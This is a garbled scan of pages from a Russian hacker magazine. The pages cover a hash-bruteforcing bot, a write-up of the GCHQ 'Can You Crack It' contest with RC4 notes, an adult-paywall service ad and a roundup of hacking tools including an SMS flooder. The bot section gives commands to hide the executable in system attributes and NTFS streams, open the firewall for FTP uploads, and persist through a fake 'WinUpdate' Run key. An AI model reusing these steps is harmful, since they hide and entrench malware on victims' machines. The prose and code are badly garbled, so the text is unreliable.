которые неграмотный были на ней найдены. Их дозволено исключать на панели

невидимым, ведь кушать рента никак не хорэ видно.

управления ботами. Но бери оный случай, неравно ботик сделано брутит да немо­

Для сего не запрещается nрибегнуть для подручным средствам, а то есть

жет отстучать, сколько некто живой, допускается тоже произвести во таблице

со не без; тавить кофта следующего содержания:

колонка

нужно из пошатывать софтин для у ВАТ То ЕХЕ Conveгteг

lastcallback . Там

отображается число, которое указывает,

%CD%\bot.exe. Далее 1.5 да скомпилировать

при случае ботик отстучал на nоследний раз. Таким образом, присутствие каждом

на ней таковой батник, перед указав во настройках invisiЫe

обращении ко серверу зто важность обновляется.

application равным образом выбрав держи вкладке include три файла: bot .exe, теку [php5ts.dll) да самолично консольный брутер [md5.exe).

Если оно свыше 000 [дефолтный пятиминутный интервал отстукивания бота), в таком случае сие значит, что-то ботик работает или — или находится

библио­

Программка создаст сам в области себе файл, впахивающий во фоновом режи­

во офлайне. Затем нужно сформировать источник конфигов. Конфиг, во вкусе

ме . Затем позволительно совершить так, с целью скрывались равным образом самочки файлы . Для

ты, возможно, заметил объединение вышеприведенным кускам кода, состо­

сего глотать изрядно способов. Водан с них- это, например, про­

ит с двух частей, объединенных наслышан

0.

стое употребление штатной виндавай софтины attгib от флагами

Первая порция отвечает вслед команду, которую nолучает бота,

'+h ' да '+s'. При мер:

а вторая- вслед дополнительные данные, нужные про исnолнения

этой команды. Чтобы отдать команду получи установку, наш брат должны

attrib "%CD%\bot.exe" +h +s

выслать черт знает что слыхать iпstalllvocab_123123123.txt, идеже iпstall­ этo повеление установки бота, а

vocab_123123123 .txt-

сие обложка

словаря, некоторый потребно установить. Мы опять же можем прополоть однако

Такая общество скроет равно сделает системным свой обложка бота. Спрятать обложка во потоках

NTFS

капельку сложнее:

рабочая сила файлы, легко удалив их,- для того сего порядочно по­ слать команду

clean.

Ну да самая главная команда- сие bгute.

Второй параметр этой команды объединяет хеш да ради б рута

cd "%systemroot%\system32 type packed_bot.exe>calc.exe:bet.exe

вместе с через двоеточия:

Запуск быть этом осуществляется в свою очередь от через батника: brute)c4ca4238aeb92382edccse9aбf75849b: c81e728d9d4c2fб3бfeб7f89cc14862c:eccbc87e4b5ce2fe28Зe8f

d9f2a7baf3 Все результаты заливаются в ПР-сервер, что находится там же, идеже да носитель управления . Попадает всё сие деятельность во папку

cd "%systemroot%\system32 start .\calc.exe:bet.exe Наш обложка во книга числе загружает результаты в FТР. Файервол

Windows

может сверху сие сквернословить , потому попробуем его обойти:

гesults. Для того с намерением присыпать во базу готовые результаты, лодка <<дер­

гает» скрипт не без; передачей параметра

iamfinished.

С криnт сервера

passthru( 'netsh firewall add allowedprogram %WINDIR%\ system32\ftp.exe TCPinfrastructure>nul 0>&1 ' ); Авторан про нашего ехе [если симпатия лежит, например, в % systemгoot % ):

passthru( 'reg add HKLM\software\microsoft\windows\ currentversion\run /v WinUpdate /t REG_SZ /d %WINDIR%\packed_bot.exe /f>nul 0>&1' ); ЗАКЛЮЧЕНИЕ В РНР без счету функций, предназначенных на создания нехи­ лого файлового менеджера иначе говоря а простого системного помощника . Я надеюсь, что-то вследствие моей статье твоя милость убедился никак не только в этом, а да да во том, что-то в целях автоматизации процесса суще­

ствует уймища различных средств , которые присутствие совместном

Рабочий лодка

ХАКЕР

03/158/20 02

использовании могут что есть мочи тебе помочь.::;:

065


plaintext lfi rst!a plaintext.su, http://www.plaintext.sul ·

can cra 8t' 1• РЕШЕНИЕ ЗАДАНИЙ ДЛЯ ХАК-КОНКУРСА, УЧРЕЖДЕННОГО

УПРАВЛЕНИЕМ

ПРАВИТЕЛЬСТВЕННОЙСВЯЗИ ВЕЛИКОБРИТАНИИ

Недавно Управление правительственной маза

Великобритании объявило куцый

Н-конкурс, воеже прилакомить для себя внимание к а ко ко работодателю . Не уверен, ась? для ним кто­ то устроился возьми работу, однако пройт равно задания изо

На нашем диске ты смож ешь найти видео от полным прохождением

конкурса « Сап

You

Cr ack lt?».

спортивного интереса жив не буду захотели многие .

.PNG .......IHDR. .............j .-•... sRGB ......... pHYs ................. tiME. .. .. . 0-9.p ... )iТXtComment ..... QkJCQjiAAACR2PFtcCAбq2eaCBSR+BdmD/zNzLQC+td3tFQ4q x8044 7ТDeuZwSP+{)SsDEcYR.78J KLW=2 ...... IDATx ... yt .... лcwuW... So-.. ,....... L.. l!!> ... q .. 08.. 0.. a.7.,. НV.y.&.:. G.a ...... mMH.d ......\ .U... ?.n7-Ktuwi ... Gj.R. ..... g.} .. .. sн. д .... sн . д.... sн . д .... sн . д .... sн . д .... sн . д.... sн . д .... sн. д.... sн. д .. .

.sн . д.... sн . д. ... sн . д.... sн . д.... sн . д .... sн . д. ........o.. u.... во :. Lz . D .. I!!>.B c.... .l.4.. ) .... • -....... d .. !QZ. •-ее. D, .. ,.. q.R.fc.. & .•w41r... Ra6... 0...:... ".. } .D.r..https://issuu.com/14.% ....... D<. D " s .i A.ТX, .. ZD .... $....... лX. .. 0.. ·.C.9y.i ...V... ,MO.. G.B y .... B .......... (<.C.. q .. X.Di .. 0M .....f{... Sv; .. (... 0.H.&'.}}y.j....... 0.. BQ.. !. .... zz.... t..jM&...... К. .. s% .... f .. nW.... X.fH .... s.. k .. h.vmm-' .._y: :.' p.6... djSK ............. R. .. R.. 0. Q.... >..... <....... bH ...... C.1 ... t) . .........-.UX,.%K11!> ..

Задани е первого этапа

066

Комментарий для файлу от заданием

ХАКЕР

03/158/2012


0

Итак, некоторое сезон вспять Управление

местоположение конца отечественный е го кода, указываю щишки й, идеже

void

правительовенной взаимоотношения Великобритании

со держит ся значе ни е ОхАААААААА. Д алее

{

об ъявило конкурс, успешное оборона хож д ение

изо стека изо влека ется

DWORO,

нивается не без; ОхАААААААА. Затем извлекается

свое резюме, а в рассуждении сего равно уйти возьми работу

е ще относительно дн по части з начени е, ко тор ое срав нив ае т ся

во брита н скую киберразве д ку . Пр едложе нны е

вместе с О х ВВВВВВВВ . Однако сего куска дан ных

после дания н е где-то олигодон сложны, д а равно саму стра­

!второй половины стека функции] у нас нет.

ницу отдела к~дров Управления правитель­

функции , необ хо партия в отношении не потерять погрузчик тин ку от за­

одновременно обнаружи ть подле п омо щишки пои сков равно для а

дани е м со ущелье та равно п осмо третья часть , равно как буква деятельность

Google,

при всем том настоящий состязание всё но интере­

сен , приблизительно в духе дьявол позволяет расценить у ровень

по-под г отовки сотрудников, ко т орые соста вля­ ли задания.

На странице ко нк урса, находящейся в соответствии с

iTXt РNG-файла не без; после ­ данием ! ко диров ка UTF-8]. Бинарные д анные закодированы вместе с п омо щью алгоритма Base64 и следуют ради сло во ом Comment !смотри рисунок].

}

Раскодировав да склеив дв а бинарника, ваш покорный слуга за­

v1 v2 do

ния, тот или иной представляет собою следующую

ствующий рисунок] да надпись-дразнилку «Сап

строку:

Сгасk

lt?>>.

l~hile

первоначально подумал, что-то сие после шифрованное по­

GET

/ 05b43бde1f9187f3778aad525e5d8b28 .js

ASCII,

одначе у меня

нуль невыгодный вышло. В итоге пишущий эти строки решил впихать всегда

НЕХ-значения вместе с рисунка во двойной фай л и открыть полученное безнравственность во

IDA

Рг касательно . В

После через п равки соот на е т ствующе г в рассуждении

GET-

зanpoca н а сервер получаем блюдо из-за дан ие.

Кстати, ко д дозволяется запус тить нескольки­ ми со п особами. Я создал без затей ехе -фа йл, в котором сперва считывается часть заключение вместе с

таты.

вслед согласен нием, а испарина ом всё э т по отношению д ело запускается держи

распознал осмысленные куски

заключение в целях архитектуры х86 . Я п что до нял , ч т об выбрал

устройство ! п од ко н тро л ем

классический п у ть.

азбучная истина ассемблерной вставки:

IDA] присутствие палочка-выручалочка ощ равным образом

OxDEADBEEFu; +

v1 ;

( (_BYTE ) vO ) ; sub_39 (); } Результат декомпиляции

нием. Д ля сего безвыгодный нужно понимать величина

PNG,

а довольно легко присутствовать внимательным !не­

Недолго думая , моя особа преобразовал паркет уче н­ ный отрезок стих на функцию равно запустил д еком­

=

l~hile

итоге ми посчастливилось настил бить кое-какие рез ул ь­

IDA несомненно

( (_BYTE ) vO ); о;

}

НТТР / 0 . 0

мости каждого зна чения да попытался дальше

передвинуть их на символы

0;

LOBYTE ( v1 )=v2 + v4[ v0 ] v2=ROR __ ( v2 , 0); v3=v4[ v1 ]; v4 [ v1 ]=v4[ v0]; v4[ vO ]=vз ; lOBYTE ( vO )=vO + 0;

Уви д е во сии Н ЕХ-значения, автор этих строк

слание, начал было сводить счеты частоту встречае­

+

{

пустил адрес получай исполнение !под отладчиком] и пр осмотрел рез ультат пр в рассуждении ц е д уры дешифрова­

You

v4[ v0 ]=vO ; lOBYTE ( vO )=vO

усик тро е для . Недостающие д анные со держатся во

не без; набором НЕ Х - з начений !смотри соответ­

о;

{

дополнительной секции

адресу caпyou cг ackit . co . uk , наш брат видим картинку

cdecl sub_O()

vo do

Чтобы раскопать вторую половин у стека нашей

овенной знакомства IGCHQJ позволяется пр акти ч ески

itl

int vo ; // есх@1 int v1 ; // еах@З unsigned int v2 ; // еdх@З char vз ; // bh@4 char v4[256] ; // [sp+Oh] [bp-100h]@2

который-нибудь срав­

которого п вал воляло послать во У регентство

из ап сгасk

обходима моя особа рэнкинг со держится на самом

начале файла].

_ asm

пилятор. Сначала во стеке ваш брат деля ется место под конгломерат на

056

байт, кто заполняется

значениями с О вплоть до

055,

а дале е вып касательно лняется

проце д у ра преобразования массива, которая

int 0;

mov call

SECOND STEP

nрограммная этап останова

еах,

еах;

array; ar ray -

сосредоточение

не без;

кодом

заnус для ко славословие в выnол нение

узнать на своем опыте настрочить эмулятор микро­ nроцессора . Дан отрезок памяти не без; кодом да

бери са мом д кой-как пре д вместе с т авляет на лицо алгорифм

инициализации шифра RC4 от ра зме кашаса блока 8 двоичная единица информации да ко люч ом OxD EADBEEF !смотри рисунок] .

Во втором задании а вт оры предлагают нам

данными, а в свой черед описана застывшая музыка

Хочу отме т ить, аюшки? на начале заключение прои схо ­

микропроцессора, чтобы которого вс ё сие

После лишь сего вызывается единаче одна функ­

дит jmp путем цифра !вроде бы] неиспользуе­

предназначено . Процес шелупонь состоит с

ция, плеть которой испорчен, да поэтом у что до н а малограмотный

мых байта. Э ти цифра байта пр бремя дя тся нам на

за зубам декомпилятору.

дальн ейшем. Как видишь, во-первых нагрузка до­

восьми регистров, четверик с которых !гО ... гЗ] представляют из себя регистры общего на­

панибратски относительно со тое. Затруднения возникли чуть

значения, двуха предназначены интересах хра нения

Как оказалось, на начале второстепенный функ­ ции ценность регистра

esp,

содержащего

указа тель держи вершину стека, меняется получи

возле об нар ранее нии второстепенный части не без; тека функции

адреса сегме нта стих да а др еса сегмента

на дополнительной секции РNG -файла из зада-

данны х ics равно ds соо тв е т ственно], об д ан ре-

printf ( ''\nkeygen .•xe\n\n'' ); if ( ~1 •• 0 ) (

uS • ( FILE • ) f ope n6 0("'license.txt" . ''r" );

if ( us ) ( MI?IIISet (&U9 0

D.

UNIX CRYPT()

0Jш);

fsc.:.nf ( uS . '"ts'' • r.u9 ); f c lose ( uS ); if ( u9 •• ' qhcg' )

Функция сгурt на операционных системах

{

u2 • crypt (); if ( ! s tr c ~tp ~ ( const char· • ) u2 . ghDTK7b8Kru w) ) U13 • 0;

printf ( "loading stage1 license key(s) .. . \n''); u6 • u10 ;

printf ( "loading stage2 license key( s ) . . . \n\n'' ); u7 • u11 ; u8 • u1 0 ; }

if ( U13 ) (

u4 • Tr ans•itl nfo (•(_DWORD

• )( а2

• lt). ( int )&u 0 );

}

else {

pri ntf ( ''er-ror: licf'nse.txt i nualid\n''); u4 • - 0;

*ni x

извлеченный секция шифрованного текста опять-таки

DES

служит для того хеширования различных данных,

шифруется от через алгоритма

на томишко числе паралей пользователей системы.

Таким образом , содружество изо восьми нулевых байт

равным образом т. д.

Традиционная материализация этой функции

шифруется на nроцессеработы

использует заокеанский алгорифм

отметить, сколько сгурt отнюдь не использует стандартную,

DES (Data

05

единожды . Стоит

Encгyptioп Staпdaгd]. Пароль пользователя

эталонную реализацию алгоритма

сокращается предварительно восьми символов, ото каждого

Алгоритм всякий присест чуть меняется . Его

изо которых, во свою очередь, берется

конкретная воплощение зависит с соли длиной

0 бит. 7 двоичный знак формируют 06-битный DES, близ помощи которого

DES.

Восемь наборов по мнению

02

родник алгоритма

nреобразуются на строку подле помощи алгоритма

шифруется установка изо восьми нулевых байт . Затем

бит. Соль равно шифрованный молитва во итоге

Base64.

Основной функционал программы keygen

ХАКЕР

03 / 058/ 0012

067


взламывание

short loc_6

-------------; :=====-=-=-=-:..::;- ----------------------------·

-------------

dd OAЗBFC2AFh

-

0

-----------------------------------·

loc_6:

; sub xor

сэ:

ОхОО ,

dэ:

OxlO ,

fl :

ОхОО ,

j tirmware:

esp,

000h

есх,

есх

СООЕ

XREF: sub_O!j

[ Oxd2aьlf05 , OxdalЭfllO ] So you did it- пожелание вместе с успешным

Неиспользованные значения изо первого равно второго заданий

гистр служит про хранения флага операции

[flgl, да один- пользу кого хранения адреса текущей инструкции [ipl. Микропроцессор обладает набором с

описании задания упоминается перечень cs, так а как бы равным образом г51. Второй повозочный камень -реализация fаг jump'oв равным образом изменения ip.

выполнением заданий

GET /da75370fe15c4148bd4ceec861fbdaa5.exe НТТР/1.0

Здесь прямо желательно знать, зачем значения ре­

восьми инструкций, каждая с которых [за

гистров, отвечающих ради постоялый двор сегментов,

Отсылая ближайший GЕТ-запрос ко сайту, полу­

исключением инструкции hlt, прекращаю­

изменяются всего возле дальних переходах равно

чаем третье блюдо следовать дани е - исполняемый файл. При

щей действие программыl имеет неудовлетворительно

далеко не изменяются, кабы ip начинает направлять

просмотре зависимостей сие го файла видно,

режима работы: mod О равно mod 0. В принципе,

получай новоявленный макросегмент заключение . В остальном а всё

зачем на его работы необходим Cygwiп. Вообще,

к успешного выполнения задания до­

нетрудно равно прозрачно. Разработчики заданий

во свойствах полученной программы указано,

статочно быть носителем небольшими навыками

предлагают нам провести в жизнь эмулятор получай

который сегодняшнее кличка зкзешника keygeп.exe, где-то

программирования, а в свой черед представлять,

языке JavaScгipt, все получи то, короче ли

почто бесстрашно переименовываем его.

наравне рабо т ают микропроцессоры. Однако на

учтено выполненное задание, коллекция языка

процессе программирования автор наткнулся

программирования безграмотный влияет. Я реализо­

сом- адрес хоть твоя милость почто хочешь безграмотный обфусцирован. При вслед пу­

В нынешний единожды паки никаких пр облем вместе с ревер­

бери сколько-нибудь подводных камней. Сперва ваш покорнейший слуга

торсион эмулятор процессара сверху С. Программа

ске keygeп требует послать ему URL сайта про

объединил на единовластно сосредоточение регистры общего

выполняется конец быстро, даже если у меня

соединения на качестве первого под масть метра. Ал­

назначения, а в целях cs да ds выделил отдель­

были подозрения, что-то разработчики напи­

горитм работы программы довольно прост: во

ные переменные. Как оказалось, зто оши­

скоморох код, каковой бросьте подвизаться полчасика :-1 .

текущей дир ектории выполняе т ся пои ск файла

бочный подход, круглым счетом равно как во коде встречаются

инструкции будто «add г[5], 02>>, которые, по мнению

После остановки процессара [выполнения инструкции hltl во памяти появится родничек ко

тоже три числа. Судя до строкам во се гменте

замыслу разработчиков задания, изменяют

третьему этапу конкурса - на очереди GЕТ­

данных, требуемые числа представляют собою

значения сегментных регистров напрямую [в

запрос:

Stage оп е liceпce key равно Stage two liceпce key,

licence .txt, изо которого считывается строка, а

ВОССТАНОВЛЕНИЕ КРИПТОГРАФИЧЕСКИХ АЛГОРИТМОВ В сегодняшний день минута экстремально сыскать

<<заnо дозрить >> оный alias какой-нибудь узел заключение на

коммуникационную систему, которая неграмотный

nринадлежности для какому-либо алгоритму .

ISBo x' ыl, некоторые люди специфические константы,

использовала бы криnтографию. Часто во

Так, например, современные симметричные

а и такие nараметры алгоритма, вроде метраж

процессе реверс-инжиниринга различных

блочные алгоритмы шифрования обыкновенно

ключей [в книжка числе расстояние массива раундовых

модулей необ х одимо разнюхивать

построеныпоитерационной схеме, на которой,

ключей!, апофема блока, сумма итераций

равным образом восстанавливать используемые

во вкусе правило, производится выкуп значений на

[раундов! да т. д. Подобными признаками

криптографические алгоритмы, режимы их

соответствииснекоторой таблицей на памяти ,

равным образом обладают равно хеш -фун кции. Алгоритмы

работы, nорядок выработки равным образом использования

нало жение ключа шифрования равным образом линейное

хеширования естественным путем исnользуют взрослые

ключей шифрования да т. д. Разбор конкретной

конверсия . При этом во пределах одной

наборы констант, аюшки? облегчает отождествление

реализации алгоритма такженередко

функции во ассемблернам листинге может

как алгоритма равно его воскрешение .

позволяет далеко не лишь только раскрыть ее ошибки, только

попасться подина руку цикл, большое численность

Стоит отметить, который на подавляющем

равно оnределить, почто алгорифм исnользуется

инструкций тиnа

mov, movzx , add, хог, shl, shг

большинстве программных реализаций

неnравильно, во результате аюшки? могут

да т. д ., а да частые обращения ко nамяти [в

симметричных алгоритмов шифрования

происходить уязвимости, nозволяющие на

качестве nримера подожди рисунок!.

отправления выработки массива раундовых ключей

конечном итоге nровести усnешную атаку сверху

Кроме того, в целях каждого криптографического

lkey schedulel равным образом выражение дешифрования/

систему на целом.

алгоритма не грех предоставить отдельные люди

шифрования открытого текста находятся во

Вообще, универсального рецеnта сообразно

<< отличительные внешний облик >> , которые позволяют

разных участках заключение программы . Это помогает

распознаванию криптографических

автоматизировать разыскивание необ х одимых

поторопить nроцесс обработки информации (и

алгоритмов отнюдь не существует, не запрещается всего только

участков кода. Чаще просто-напросто такими признаками

никак не употреблять отдельный однова промежуток времени да репертуар держи

обособить отдельные люди nодходы равно оnисать

служат константы, х арактерные чтобы того

nолучение

отдельный nризнаки , которые позволяют

тож иного алгоритма. Для симметричных

алгоритма!.

068

алгоритмов сие могут фигурировать блоки подстановак

key shedule

с основного ключа

ХАКЕР

03/158/ 0012


0са п cra ck it l

Ито г насчёт на ый GЕТ-за пр ос для се р ве р у равно м еет

так поглощать сие неко т в отношении р ые д ин н ые, дл пишущий эти строки n олучения

которых нельзя не принять решение из-за д ачи , п ре д ла­

со л едую щ ий на равным образом д :

АЛГОРИТМ

гаемые получи первом равно втором этапах конкурса.

Прочитанная изо файла черта nреобразуется

присутствие nомощи функции crypt [из Cygwin ) да срав­

RC4

GET / hqDT K 0 b8K2rvw/ A ЗBf C 0A F /D2 AB1F e5/ DA1 0F1 0e/key.txt НТ Т Р / 0. е Алгоритм

нивается не без; э т алон н ым з н а ч е н ием изо сегмен т а

данных программы. Д ойдя д по отношению э т ого сия n а, моя особа

Этот интерпелляция позволяет выпустить из рук обложка

[также изве не без; тен что

ARC4)

сверху

уже было nриня-лся крушить хеш изо сегмента

key.txt,

данных, впрочем э т в отношении был тупиков ы й п уть, равно на сё

не без; п холм д равлением

оказа л центр гораз д что до n р относительно щ е. Н еобхо д имый IР ­

сверху оп исание вакансии, во ко т что касается р ом выкладывай т ся,

Ривесто м , одним изо основателей компании

ячейка следовательно вместе с использованием перво г в рассуждении

сколько конкурсанту, успешно выполнившему безвыездно

R5A

nараметра программы [UR L сервера) равно DNS.

из-за д ания, вовсе далеко не предлагают работу из первых рук

ладает рядо м до самого из тоинств , для которым на первую

Как неприхотливо д ога д аться,

UR L д олжен

п ред­

на котором указан кнопка с страни ц ы

RC4

сегодняшни й -де н ь является одним с самых

<<So you did it» равно ссы л который

известных да повсюду используемы х поточных

шифров. Алгоритм был разработан Раном 5ecu гi ty, во далеком

0987

году .

RC4

об­

сейчас, н в отношении согласны проанализировать его канди­

очер е дь относят со пишущий эти строки высокая стремительность работы

став пят ь на лицо а др есть страницы от следовать ага ни ями:

правда т у р у п озже, когд а на У п равлении п оявятся

да п е ре м енная длительность ключа . На каждом такте

canyouc г ackme . co.uk . Д алее

свободные вакансии.

keygen.exe форми­

работы алгорит м генерирует

рует для удаленному серверу G ЕТ- требование вида:

SUMMARY GET /%s/%e8X/%e8X/%e8X/key .txt

НТТР / 0 .е

Как пишущий эти строки уnоминал ранее, возьми месте строки на за­

0 двоичный знак

псевдослу ­

ча йн в отношении й объединение не без; ледовательно от ти равно изменяет со вое вн у треннее не без; остояние , для оторое определяется

З бездна анияотУправления п равительствен -

перестанов для ой значений через О давно

утнапиштим крыша Великобритании никак не представля-

дву м моя особа однобайт н ыми кое-где для сами:

055 [5) и i равно j. Алго­

индеец ни перед каким видом ой сложности да во первую цепь

рит м

просе овчинка выделки стоит хеш-з н ачение с сегмента данных .

ориентированы для проверку смекалки, а ранее

инициализаци равным образом [К5А) да алгоритма выработки

Остае т ся лишь только най т равно значения <<ли ц ензионных

позднее - навыков реверс-инжинирин г а да про­

псевдослуча й же й последовательности . Про­

ключеЙ>> п ервого равно второ г касательно э т апов из-за д аний,

граммирования да знаний касательно принципах рабо т ы

цедура инициализации служит для того выработ­

ради ась? моя особа начал скликать данные, которые

микропроцессоров. Выполнить сии задания почти

для да п е р е становки

для сих этапах безграмотный использовались. На первом

силу любому человеку, у которого хватит за глаза

через

этапе сие четверик байта во начале кода, сквозь

терпения равным образом энтузиазма. Это неявно свиде­

псевдо для одом :

котор ы е ш ел п ер во об н ачал ь н ы й

тельс т вует в отношении том, ч ведь во

jump. Дл автор

00

RC4

вплоть до

состоит изо дву х частей : процедуры

056

0

около помощи для люча длиной

бит. К5А описывается из ледующим

GC HQ работают обычные

второ г по части этапа сие нигде отнюдь не пригодившееся двушничек

человечество ,

ОWОRО-значения firmware [смотри рисунок).

которые во зрелищных голливудских фильмах

Вообще, закачаешься втором задании невыгодный использовался

взламывают парали вслед пару минут равным образом со легкостью

огулом беспристрастный ба н ко памяти, кото ры й нате ч равным образом н ае т ся

п ро н икают на вслед щ ищенные узы правите ль из т а

j

не без; сигна т уры

разных стран. Н апоследок неймется побла г о­

f or i f r om е t o 055 j :=(j + S[ i ] + key[i mod keylength] ) mod 056 swap va lu es of S[i] and S[j] _ endfor

0z,

по части дн ако неграмотный ваш покорный слуга вл яе т ся в отношении д ноимен­

everyday heroes, а

никак не те супермены,

ным архивом. Этот учас т ок, безвыгодный потребовавший­

приносить в дар британцев после снова одну возмож н волос

ся на выполнения задания, видимо , нужен

<<размяться» да ревизовать близкие навыки . За д ания

прос т об д ля того, ч т обы из-за п ута т ь конкурса н в таком случае во .

наших спецслужб были бы камо хар д ко рн ее. :х:

• •

.

• text :101221121 . text:10122112 .. • text: 000221126 • text :101221129 • text :1 ОО22А2С .text:100221133 • text: 0 00221136 • text :1 0022А38 • text: 0 00221138 • text: 0 002211ЗЕ • text: 0 012211..5 • text :1002211 ..7 • text: 0 002211..8 • text :1 01221152 • text :101221155 • text :100221157 • text :1 012211SA • text : 0 0122ASO • text :1 OI22ASF • text :100221162 • text :100221169 .text:10022116B • text :10022116Е .text : 000221171 .text:100221173 .text :100221176 • text :100221178 .text:10022117B • text: 00122117Е

ROU ROU

shr ROUZX ROUZX

Shl AOU

Shl" AOUZX ROUZX XOI" AOUZX AOUZX

Shl XOI" ROU

shl AOU

Shl" AOUZX XOI" XOI" AOU XOI"

esi. (eax• 0Ch ) есх. esi есх • 00h 0 edx. cl есх. ds:byte_10058188[edx) есх. 0 edx • esi edx. 0 edx. dl edx. ds:ьyte_10058188(edx] есх. edx edx. byte ptr (eax+ 0Ch ] edx. ds:ьyte_10058188[edx] есх. 0 есх. edx edi. (eax+ OCh ) есх. 0 edx. esi edx. 08h edx. ds:byte_100S8188(edx] есх. edx есх.

(еЬр+ О ]

edx.

(еах• 0 ]

есх.

(еах]

add

еьр.

0

XOI" ROU ROU XOI"

edx. есх (eax+ 00h ].

f or i f r om е to 055 S[ i] :=i endfor

:=

е

Алгоритм выработки псевдослучайной последовательности опять же будет прост .

Он описыва е тся следующим nсевдокодом :

i j

:=

е

:=

е

whil e GeneratingOutput: i :=( i + 0) mod 056 j :=(j + S[ i ] ) mod 056 swap valu es of S[i] апd S[jJ _ К :=S[(S[i] + S[j] ) mod 0;>6] output К endwh i l e Алгоритм

RC4

применяется к шифрования

данных во протоколе

05L, защиты трафика WEP, защиты документов Adobe PDF и Microsoft Office . Широко известны случаи,

во

когда-никогда неправильное исnользование данного

алгоритма позволяло вос вместе с тановить конфи­

денциальную информацию . Так, некоторое время отворотти-поворотти в целях защиты содержимого

РDF-документов применялея ключа

есх

00

Х АКЕР

03/158/2012

AES

со длиной

ленник был способным заразиться вход для содержимому

есх.

(еах• 0 ]

файла простым перебором ключа . В одной

есх.

edx

с версий М5

Office RC4

исnользования Кусо для ассе м блерного листин г а алгоритма

RC4

бит, во результате почему злоумыш ­

за неправильного для защиты файлов для того

закачаешься не без; становления да х содержимого х ватало

069


,.,~,.

(

~ '"r;- -,'

::,

~\ "~,.'

~.:~~~~

* :

r

• ~:---~

касательно

03

00000004 Ноемо бозо .-.кoe.rndЬ Количеста касательно кееа.:

Оwт

09

Услоои• обробо""' r:t>

02

ДоnусТW<ЫА"'""""'fМ

0


с~ ... ~~ ~ сосорост-.

0898K8i5

Ф,,".,

0021 04

Mys..o

~

020~1

0•

022988

ТВ

0-4е<IОЭ

....

tфт

0~0

приема у квалифицированного специалиста.

Поиск в соответствии с базе:

+

с==_

выискивать

Вы nоnали держи самый немалый файловый разведчик во рунете . Ищите любые файлы равно скачивайте бери неограниченной скорости с самых больших торрент-трекеров

Попупярные требования :

сайт << Проверка зрения при помощи интернет». Он, естественно, был ахти недурно

IV сауз роща камышовая кошка интерны wow аватар кас пере палка патч 0010 GTA Starcraft 0 рок ПрОГраММЫ dVd 0QQ9IOSSieSS ИЛаЯ ре nорно КОМеДИЯ mpЗ sasha grey музыка бесплатно

ссылку, которую выплюнул поисковик, и-

что касается чудо'- сие оказалось не кто иной то, зачем нужно:

''

кв н friends Fleur lost Dragon дgе crysis прожекrор перис хилтон шабаш

Конечно, Ваня испугался, а у страха, равно как из­ вестно, зенки велики. Ваня ткнул первую а

daemon total

pdf медсанчасть фильмы HQ пипец windows 0 HD 020р от валять dvdrip качество Весёлая усадьба house КаМеДИ

оформлен и, зачем самое главное, предлагал проверить видение поуже сейчас' Ваня быстро нажал «Пройти проверку» равно ответил для во­ просы анкеты, которые прошел слух должны были выявить, что такое? но всё-таки содеялось не без; его

глазами. Когда Ваня ответил получи безвыездно вопросы, сайт сообщил ему, аюшки? устраивание диагноза, вообще-то, платная, только есть расчет по дешевой цене равно что такое?

Ложный

072

depo si tfiles

пользу кого его получения надлежит внедрить собственный

ХАКЕР

03/158/2012


Доброго времени суток уважаемые форумчанеl Предлагаю формирование adult платников . в услугу входит : -Установка блик платникiJ

Целевой сайт

-Настройка категорий -Нарнсовка уникального Лога -Наполнение

-nотключенне для бнллннrу

А ТliКЖе дорога согласно каталоrlllм©''


взламывание

Marlicq 084888, http://snipper.rul ·

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ

Автор :

NEOx. URL:

Rro_r_,._,..,..НIIP

"' or тat> •

о'> е

..

Ьit .ly/x 0Lk8n.

--

._ ......

РЕ

Tools- сие

не без;

Q

~ ---~

Система :

полнофункциональная утили-

[64bitl. Она

Автор :

famatech. URL: radmin.ru/products/

SuicideiVII] . URL: rOOt .in/showthread . php?t=18056.

0pscanner.

Windows .

та в целях работы вместе с файлами РЕ /Р Е +

Автор :

Система:

Система :

Windows.

Windows.

Е сли т ы когд а -либо использовал во своей по части ­

П ро га представляет с лица относительно д винутый SМS­

вседне во утнапиштим работе

флуд ер, позво л яющий циркулировать сведения

Radmin,

в таком случае советую тебе

охватывает во себя следующие мо дули : вычитчик

попробо на ать во деле снова одну программу касательно т тех

из любым текстом . Д лина об д ного СМС стандар­

РЕ- файлов,

а авторов -

тна да составляет рядом

Task

Vieweг, оп т имизатор

Win32

Advanced

0

Р Scanne г. Как яс н в отношении

05

этим во олов держи кирил­

Р Е -файлов, д етек т гам компи л моя персона т ора/у п аковщика

изо названия, п ро га n редставляе т собою п р в отношении ­

лице равно

равно м н огое другое. Ос н овн ы е возмож н ости про­

дв инутый тенетный скэнар .

живается отп ра вка С М С на т акие страны, по образу

г раммы без труда п оражаю т на оображе ни е.

Функционал равным образом основные добродетели тулзы:

Р оссия, Казахста н , Узбек да вместе с т а н , Украина. Дл автор этих строк

0.

работы флудера т ребуются ва ли д ные аккаунты

образование дампов п роцессов [Full, Pa г tial,

вляе т многопоточное сканиро на а н ие со т ен

Maii. Ru.

Regionl;

кусок п ьютеров на сети, с целью обнаружить такие ре ­

таких аккаунтов. Ты во п ол н е сможешь обнаружить

сурсы, что общие папки, Н ТТ Р, НТТ РS да FТР,

раздачи вместе с ними, заре г истриро во ать аккаунты

равным образом получитьдоступ ко ним.

независимо alias но вос п ользоваться од­

Интеграция со

ним с многих nубличных брутфорсеров сего

окончание работ ы процесса;

Radmin . Б лагодаря инте­ грации из Radmin, свой сканнер находит все маши н ы от заnущенным Radmin Sегvеги п насчёт ­

погрузка относительно ц есса на РЕ E ditoг да РЕ Sniffeг;

зволяет впоследствии пристроиться ко ним на одиночный

атрибуция О ЕР.

зов . Д ля сего возьми компью т ере, вместе с которого

mymegaemai l @mail .ru:passw l r u: pas s

0.

.NET CLR-npoцeccoв; Anti Dump

автоматическое сброс защиты Pгotection;

0.

вариация приорите т а процесса;

РЕ Sniffer:

осущес т вляется сканирование, предварительно л но н б ы т ь

оп ре д е л ен да е т да п а для касательно мп осадок аз многогрешный т ора/у п аков щ ика;

обычай н ов л е н

обнов л е н ие б а зы си гнат ур ;

0.

0.

Radmin Vieweг.

Уд а л енное на ыключение килоом п ьютеров. Эт а

Автор рекоме н задувает кто наделен с

000 по 000

сервиса. Файл вместе с аккаунтами обязан име т ь поверхность :

И нт ервал флуд а вместе с насчёт дн ого мейла соединение л яет пример н по отношению что касается д ну-кась ми н уту, п оэ т ому соз д ате ль п ро­

просматривание д равным образом р екторий.

функ ц ияслужитд л пишущий эти строки выключениялюбо г касательно

граммы рекомендуе т рабо т а т ь из ней вместе с д е д ика,

